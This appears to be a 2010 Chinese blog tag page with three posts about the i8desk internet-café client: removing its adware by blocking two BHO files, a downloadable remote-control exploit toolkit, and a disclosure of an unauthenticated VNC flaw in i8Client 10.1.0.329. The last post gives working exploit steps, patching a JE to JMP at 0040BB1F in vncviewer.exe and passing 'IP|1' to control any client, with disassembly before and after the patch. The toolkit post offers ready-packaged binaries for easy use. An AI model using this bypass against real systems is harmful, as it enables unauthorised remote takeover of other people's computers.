Posts Tagged i8Client

i8去广告

Posted by on 星期三, 11 8月, 2010

  i8的广告确实烦人,动不动弹个网页,再不就在桌面生成一个“上网从这里开始”

  于是用Autoruns查到i8有两个bho,怀疑是这两个bho搞得鬼,于是直接在ntfs分区上对这两个bho文件everyone权限拒绝,IE终于不乱跳了,桌面也没有“上网从这里开始”那个讨厌的快捷方式了。

  看图操作:

i8远程控制漏洞利用程序

Posted by on 星期一, 28 6月, 2010

i8 远程控制漏洞利用程序:

这个文件就是按《i8desk2010客户端远程控制漏洞》这个方法修改的。

一段cmd脚本,用来将参数传入i8vnc_crack.exe,纯粹的为了使用方便。

与上面那个i8vnc_loader作用一样,只不过是做成exe版本的了,并且多了个ip地址检查的小功能。

这个版本实际上就是将i8vnc_loader.exe和i8vnc_crack.exe两个文件用rar压缩生成自解压文件,并在解压到临时文件夹后执行i8vnc_loader.exe,懒人和不知道怎么用的人就下载这个吧。

i8desk2010客户端远程控制漏洞

Posted by on 星期五, 18 6月, 2010

  i8desk2010 内置了一个VNC远程控制,这会给维护带来很大方便,但是这个VNC有严重的问题,那就是客户端不需要身份验证即可被远程控制。
  有问题的版本为:i8Client 10.1.0.329
  将i8desk2010服务端内的vncviewer.exe分离出来,用OllyDbg修改以下内容,再以“IP|1”(例如:D:\vncviewer.exe 192.168.27.6|1)的格式作为参数传入vncviewer.exe便可控制任意i8客户端。

0040BB1A |. 83C4 08 ADD ESP,8
0040BB1D |. 85C0 TEST EAX,EAX
0040BB1F 74 1B JE SHORT vncview.0040BB3C ;将这个JE改成JMP,就可以远程控制任意一个i8客户端了。
0040BB21 |> 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
0040BB23 |. 68 A4BE4100 PUSH vncview.0041BEA4 ; |Title = "VNC"

0040BB1A |. 83C4 08 ADD ESP,8
0040BB1D |. 85C0 TEST EAX,EAX
0040BB1F EB 1B JMP SHORT vncview.0040BB3C ;这是改完的结果。
0040BB21 |> 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
0040BB23 |. 68 A4BE4100 PUSH vncview.0041BEA4 ; |Title = "VNC"